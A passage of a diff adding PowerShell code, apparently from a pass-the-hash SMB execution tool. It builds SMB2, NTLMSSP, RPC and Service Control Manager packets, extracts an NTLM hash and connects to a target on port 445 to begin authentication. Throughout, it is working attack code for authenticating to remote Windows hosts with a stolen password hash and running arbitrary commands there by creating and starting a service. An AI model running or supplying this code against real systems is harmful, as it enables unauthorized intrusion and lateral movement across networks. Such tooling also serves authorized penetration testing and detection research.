$packet_SMB2WriteRequest.Add("SMB2WriteRequest_RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoOffset",[Byte[]](0x00,0x00)) + $packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoLength",[Byte[]](0x00,0x00)) + $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Flags",[Byte[]](0x00,0x00,0x00,0x00)) + + return $packet_SMB2WriteRequest +} + +function Get-PacketSMB2CloseRequest() +{ + param ([Byte[]]$packet_file_ID) + + $packet_SMB2CloseRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMB2CloseRequest.Add("SMB2CloseRequest_StructureSize",[Byte[]](0x18,0x00)) + $packet_SMB2CloseRequest.Add("SMB2CloseRequest_Flags",[Byte[]](0x00,0x00)) + $packet_SMB2CloseRequest.Add("SMB2CloseRequest_Reserved",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2CloseRequest.Add("SMB2CloseRequest_FileID",$packet_file_ID) + + return $packet_SMB2CloseRequest +} + +function Get-PacketSMB2TreeDisconnectRequest() +{ + $packet_SMB2TreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_StructureSize",[Byte[]](0x04,0x00)) + $packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_Reserved",[Byte[]](0x00,0x00)) + + return $packet_SMB2TreeDisconnectRequest +} + +function Get-PacketSMB2SessionLogoffRequest() +{ + $packet_SMB2SessionLogoffRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_StructureSize",[Byte[]](0x04,0x00)) + $packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_Reserved",[Byte[]](0x00,0x00)) + + return $packet_SMB2SessionLogoffRequest +} + +#NTLM + +function Get-PacketNTLMSSPNegotiate() +{ + param([Byte[]]$packet_negotiate_flags,[Byte[]]$packet_version) + + [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes(32 + $packet_version.Length) + $packet_NTLMSSP_length = $packet_NTLMSSP_length[0] + [Byte[]]$packet_ASN_length_1 = $packet_NTLMSSP_length[0] + 32 + [Byte[]]$packet_ASN_length_2 = $packet_NTLMSSP_length[0] + 22 + [Byte[]]$packet_ASN_length_3 = $packet_NTLMSSP_length[0] + 20 + [Byte[]]$packet_ASN_length_4 = $packet_NTLMSSP_length[0] + 2 + + $packet_NTLMSSPNegotiate = New-Object System.Collections.Specialized.OrderedDictionary + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialContextTokenID",[Byte[]](0x60)) # the ASN.1 key names are likely not all correct + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialcontextTokenLength",$packet_ASN_length_1) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechID",[Byte[]](0x06)) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechLength",[Byte[]](0x06)) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_OID",[Byte[]](0x2b,0x06,0x01,0x05,0x05,0x02)) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID",[Byte[]](0xa0)) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength",$packet_ASN_length_2) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID2",[Byte[]](0x30)) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength2",$packet_ASN_length_3) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID",[Byte[]](0xa0)) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength",[Byte[]](0x0e)) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID2",[Byte[]](0x30)) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength2",[Byte[]](0x0c)) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID3",[Byte[]](0x06)) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength3",[Byte[]](0x0a)) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechType",[Byte[]](0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a)) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenID",[Byte[]](0xa2)) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenLength",$packet_ASN_length_4) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPID",[Byte[]](0x04)) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPLength",$packet_NTLMSSP_length) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MessageType",[Byte[]](0x01,0x00,0x00,0x00)) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NegotiateFlags",$packet_negotiate_flags) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + + if($packet_version) + { + $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Version",$packet_version) + } + + return $packet_NTLMSSPNegotiate +} + +function Get-PacketNTLMSSPAuth() +{ + param([Byte[]]$packet_NTLM_response) + + [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLM_response.Length) + $packet_NTLMSSP_length = $packet_NTLMSSP_length[1,0] + [Byte[]]$packet_ASN_length_1 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 12) + $packet_ASN_length_1 = $packet_ASN_length_1[1,0] + [Byte[]]$packet_ASN_length_2 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 8) + $packet_ASN_length_2 = $packet_ASN_length_2[1,0] + [Byte[]]$packet_ASN_length_3 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 4) + $packet_ASN_length_3 = $packet_ASN_length_3[1,0] + + $packet_NTLMSSPAuth = New-Object System.Collections.Specialized.OrderedDictionary + $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID",[Byte[]](0xa1,0x82)) + $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength",$packet_ASN_length_1) + $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID2",[Byte[]](0x30,0x82)) + $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength2",$packet_ASN_length_2) + $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID3",[Byte[]](0xa2,0x82)) + $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength3",$packet_ASN_length_3) + $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPID",[Byte[]](0x04,0x82)) + $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPLength",$packet_NTLMSSP_length) + $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMResponse",$packet_NTLM_response) + + return $packet_NTLMSSPAuth +} + +#RPC + +function Get-PacketRPCBind() +{ + param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) + + [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) + + $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary + $packet_RPCBind.Add("RPCBind_Version",[Byte[]](0x05)) + $packet_RPCBind.Add("RPCBind_VersionMinor",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_PacketType",[Byte[]](0x0b)) + $packet_RPCBind.Add("RPCBind_PacketFlags",[Byte[]](0x03)) + $packet_RPCBind.Add("RPCBind_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_FragLength",[Byte[]](0x48,0x00)) + $packet_RPCBind.Add("RPCBind_AuthLength",[Byte[]](0x00,0x00)) + $packet_RPCBind.Add("RPCBind_CallID",$packet_call_ID_bytes) + $packet_RPCBind.Add("RPCBind_MaxXmitFrag",[Byte[]](0xb8,0x10)) + $packet_RPCBind.Add("RPCBind_MaxRecvFrag",[Byte[]](0xb8,0x10)) + $packet_RPCBind.Add("RPCBind_AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_NumCtxItems",$packet_num_ctx_items) + $packet_RPCBind.Add("RPCBind_Unknown",[Byte[]](0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_ContextID",$packet_context_ID) + $packet_RPCBind.Add("RPCBind_NumTransItems",[Byte[]](0x01)) + $packet_RPCBind.Add("RPCBind_Unknown2",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_Interface",$packet_UUID) + $packet_RPCBind.Add("RPCBind_InterfaceVer",$packet_UUID_version) + $packet_RPCBind.Add("RPCBind_InterfaceVerMinor",[Byte[]](0x00,0x00)) + $packet_RPCBind.Add("RPCBind_TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) + $packet_RPCBind.Add("RPCBind_TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) + + if($packet_num_ctx_items[0] -eq 2) + { + $packet_RPCBind.Add("RPCBind_ContextID2",[Byte[]](0x01,0x00)) + $packet_RPCBind.Add("RPCBind_NumTransItems2",[Byte[]](0x01)) + $packet_RPCBind.Add("RPCBind_Unknown3",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) + $packet_RPCBind.Add("RPCBind_InterfaceVer2",[Byte[]](0x00,0x00)) + $packet_RPCBind.Add("RPCBind_InterfaceVerMinor2",[Byte[]](0x00,0x00)) + $packet_RPCBind.Add("RPCBind_TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) + } + elseif($packet_num_ctx_items[0] -eq 3) + { + $packet_RPCBind.Add("RPCBind_ContextID2",[Byte[]](0x01,0x00)) + $packet_RPCBind.Add("RPCBind_NumTransItems2",[Byte[]](0x01)) + $packet_RPCBind.Add("RPCBind_Unknown3",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) + $packet_RPCBind.Add("RPCBind_InterfaceVer2",[Byte[]](0x00,0x00)) + $packet_RPCBind.Add("RPCBind_InterfaceVerMinor2",[Byte[]](0x00,0x00)) + $packet_RPCBind.Add("RPCBind_TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) + $packet_RPCBind.Add("RPCBind_TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_ContextID3",[Byte[]](0x02,0x00)) + $packet_RPCBind.Add("RPCBind_NumTransItems3",[Byte[]](0x01)) + $packet_RPCBind.Add("RPCBind_Unknown4",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) + $packet_RPCBind.Add("RPCBind_InterfaceVer3",[Byte[]](0x00,0x00)) + $packet_RPCBind.Add("RPCBind_InterfaceVerMinor3",[Byte[]](0x00,0x00)) + $packet_RPCBind.Add("RPCBind_TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_AuthType",[Byte[]](0x0a)) + $packet_RPCBind.Add("RPCBind_AuthLevel",[Byte[]](0x04)) + $packet_RPCBind.Add("RPCBind_AuthPadLength",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_AuthReserved",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) + $packet_RPCBind.Add("RPCBind_MessageType",[Byte[]](0x01,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) + $packet_RPCBind.Add("RPCBind_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) + } + + if($packet_call_ID -eq 3) + { + $packet_RPCBind.Add("RPCBind_AuthType",[Byte[]](0x0a)) + $packet_RPCBind.Add("RPCBind_AuthLevel",[Byte[]](0x02)) + $packet_RPCBind.Add("RPCBind_AuthPadLength",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_AuthReserved",[Byte[]](0x00)) + $packet_RPCBind.Add("RPCBind_ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) + $packet_RPCBind.Add("RPCBind_MessageType",[Byte[]](0x01,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) + $packet_RPCBind.Add("RPCBind_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + $packet_RPCBind.Add("RPCBind_OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) + } + + return $packet_RPCBind +} + +function Get-PacketRPCRequest() +{ + param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_object_UUID) + + if($packet_auth_length -gt 0) + { + $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 + } + + [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_object_UUID.Length) + [Byte[]]$packet_frag_length = $packet_write_length[0,1] + [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length) + [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length) + $packet_auth_length = $packet_auth_length[0,1] + + $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary + $packet_RPCRequest.Add("RPCRequest_Version",[Byte[]](0x05)) + $packet_RPCRequest.Add("RPCRequest_VersionMinor",[Byte[]](0x00)) + $packet_RPCRequest.Add("RPCRequest_PacketType",[Byte[]](0x00)) + $packet_RPCRequest.Add("RPCRequest_PacketFlags",$packet_flags) + $packet_RPCRequest.Add("RPCRequest_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) + $packet_RPCRequest.Add("RPCRequest_FragLength",$packet_frag_length) + $packet_RPCRequest.Add("RPCRequest_AuthLength",$packet_auth_length) + $packet_RPCRequest.Add("RPCRequest_CallID",$packet_call_ID) + $packet_RPCRequest.Add("RPCRequest_AllocHint",$packet_alloc_hint) + $packet_RPCRequest.Add("RPCRequest_ContextID",$packet_context_ID) + $packet_RPCRequest.Add("RPCRequest_Opnum",$packet_opnum) + + if($packet_object_UUID.Length) + { + $packet_RPCRequest.Add("RPCRequest_ObjectUUID",$packet_object_UUID) + } + + return $packet_RPCRequest +} + +#SCM + +function Get-PacketSCMOpenSCManagerW() +{ + param ([Byte[]]$packet_service,[Byte[]]$packet_service_length) + + [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service.Length + 92) + [Byte[]]$packet_frag_length = $packet_write_length[0,1] + [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service.Length + 68) + $packet_referent_ID1 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $packet_referent_ID1 = $packet_referent_ID1.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $packet_referent_ID1 += 0x00,0x00 + $packet_referent_ID2 = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $packet_referent_ID2 = $packet_referent_ID2.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $packet_referent_ID2 += 0x00,0x00 + + $packet_SCMOpenSCManagerW = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ReferentID",$packet_referent_ID1) + $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_MaxCount",$packet_service_length) + $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_Offset",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName_ActualCount",$packet_service_length) + $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_MachineName",$packet_service) + $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_ReferentID",$packet_referent_ID2) + $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameMaxCount",[Byte[]](0x0f,0x00,0x00,0x00)) + $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameOffset",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database_NameActualCount",[Byte[]](0x0f,0x00,0x00,0x00)) + $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Database",[Byte[]](0x53,0x00,0x65,0x00,0x72,0x00,0x76,0x00,0x69,0x00,0x63,0x00,0x65,0x00,0x73,0x00,0x41,0x00,0x63,0x00,0x74,0x00,0x69,0x00,0x76,0x00,0x65,0x00,0x00,0x00)) + $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_Unknown",[Byte[]](0xbf,0xbf)) + $packet_SCMOpenSCManagerW.Add("SCMOpenSCManagerW_AccessMask",[Byte[]](0x3f,0x00,0x00,0x00)) + + return $packet_SCMOpenSCManagerW +} + +function Get-PacketSCMCreateServiceW() +{ + param([Byte[]]$packet_context_handle,[Byte[]]$packet_service,[Byte[]]$packet_service_length, + [Byte[]]$packet_command,[Byte[]]$packet_command_length) + + $packet_referent_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $packet_referent_ID = $packet_referent_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $packet_referent_ID += 0x00,0x00 + + $packet_SCMCreateServiceW = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ContextHandle",$packet_context_handle) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_MaxCount",$packet_service_length) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_Offset",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName_ActualCount",$packet_service_length) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceName",$packet_service) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ReferentID",$packet_referent_ID) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_MaxCount",$packet_service_length) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_Offset",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName_ActualCount",$packet_service_length) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DisplayName",$packet_service) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_AccessMask",[Byte[]](0xff,0x01,0x0f,0x00)) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceType",[Byte[]](0x10,0x00,0x00,0x00)) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceStartType",[Byte[]](0x02,0x00,0x00,0x00)) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_ServiceErrorControl",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_MaxCount",$packet_command_length) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_Offset",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName_ActualCount",$packet_command_length) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_BinaryPathName",$packet_command) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_TagID",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer2",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_DependSize",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer3",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_NULLPointer4",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SCMCreateServiceW.Add("SCMCreateServiceW_PasswordSize",[Byte[]](0x00,0x00,0x00,0x00)) + + return $packet_SCMCreateServiceW +} + +function Get-PacketSCMStartServiceW() +{ + param([Byte[]]$packet_context_handle) + + $packet_SCMStartServiceW = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SCMStartServiceW.Add("SCMStartServiceW_ContextHandle",$packet_context_handle) + $packet_SCMStartServiceW.Add("SCMStartServiceW_Unknown",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) + + return $packet_SCMStartServiceW +} + +function Get-PacketSCMDeleteServiceW() +{ + param([Byte[]]$packet_context_handle) + + $packet_SCMDeleteServiceW = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SCMDeleteServiceW.Add("SCMDeleteServiceW_ContextHandle",$packet_context_handle) + + return $packet_SCMDeleteServiceW +} + +function Get-PacketSCMCloseServiceHandle() +{ + param([Byte[]]$packet_context_handle) + + $packet_SCM_CloseServiceW = New-Object System.Collections.Specialized.OrderedDictionary + $packet_SCM_CloseServiceW.Add("SCMCloseServiceW_ContextHandle",$packet_context_handle) + + return $packet_SCM_CloseServiceW +} + +function DataLength2 +{ + param ([Int]$length_start,[Byte[]]$string_extract_data) + + $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0) + + return $string_length +} + +if($hash -like "*:*") +{ + $hash = $hash.SubString(($hash.IndexOf(":") + 1),32) +} + +if($Domain) +{ + $output_username = $Domain + "\" + $Username +} +else +{ + $output_username = $Username +} + +$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id +$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) +$process_ID = $process_ID -replace "-00-00","" +[Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} +$SMB_client = New-Object System.Net.Sockets.TCPClient +$SMB_client.Client.ReceiveTimeout = 60000 + +try +{ + $SMB_client.Connect($Target,"445") +} +catch +{ + Write-Output "$Target did not respond" +} + +if($SMB_client.Connected) +{ + $SMB_client_stream = $SMB_client.GetStream() + $SMB_client_receive = New-Object System.Byte[] 1024 + $SMB_client_stage = 'NegotiateSMB' + + while($SMB_client_stage -ne 'exit') + { + + switch ($SMB_client_stage) + { + + 'NegotiateSMB' + { + $packet_SMB_header = Get-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $process_ID_bytes 0x00,0x00 + $packet_SMB_data = Get-PacketSMBNegotiateProtocolRequest $SMB_version + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + + if([System.BitConverter]::ToString($SMB_client_receive[4..7]) -eq 'ff-53-4d-42') + { + $SMB_version = 'SMB1' + $SMB_client_stage = 'NTLMSSPNegotiate' + + if([System.BitConverter]::ToString($SMB_client_receive[39]) -eq '0f') + { + Write-Verbose "SMB signing is enabled" + $SMB_signing = $true + $SMB_session_key_length = 0x00,0x00 + $SMB_negotiate_flags = 0x15,0x82,0x08,0xa0 + } + else + { + $SMB_signing = $false + $SMB_session_key_length = 0x00,0x00 + $SMB_negotiate_flags = 0x05,0x82,0x08,0xa0 + } + + } + else + { + $SMB_client_stage = 'NegotiateSMB2' + + if([System.BitConverter]::ToString($SMB_client_receive[70]) -eq '03') + { + Write-Verbose "SMB signing is enabled" + $SMB_signing = $true + $SMB_session_key_length = 0x00,0x00 + $SMB_negotiate_flags = 0x15,0x82,0x08,0xa0 + } + else + { + $SMB_signing = $false + $SMB_session_key_length = 0x00,0x00 + $SMB_negotiate_flags = 0x05,0x80,0x08,0xa0 + } + + } + + } + + 'NegotiateSMB2' + { + $SMB2_tree_ID = 0x00,0x00,0x00,0x00 + $SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + $SMB2_message_ID = 1 + $packet_SMB2_header = Get-PacketSMB2Header 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_data = Get-PacketSMB2NegotiateProtocolRequest + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'NTLMSSPNegotiate' + } + + 'NTLMSSPNegotiate' + { + if($SMB_version -eq 'SMB1') + { + $packet_SMB_header = Get-PacketSMBHeader 0x73 0x18 0x07,0xc8 0xff,0xff $process_ID_bytes 0x00,0x00 + + if($SMB_signing) + { + $packet_SMB_header["SMBHeader_Flags2"] = 0x05,0x48 + } + + $packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate $SMB_negotiate_flags + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate + $packet_SMB_data = Get-PacketSMBSessionSetupAndXRequest $NTLMSSP_negotiate + $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + } + else + { + $SMB2_message_ID += 1 + $packet_SMB2_header = Get-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_NTLMSSP_negotiate = Get-PacketNTLMSSPNegotiate $SMB_negotiate_flags + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate + $packet_SMB2_data = Get-PacketSMB2SessionSetupRequest 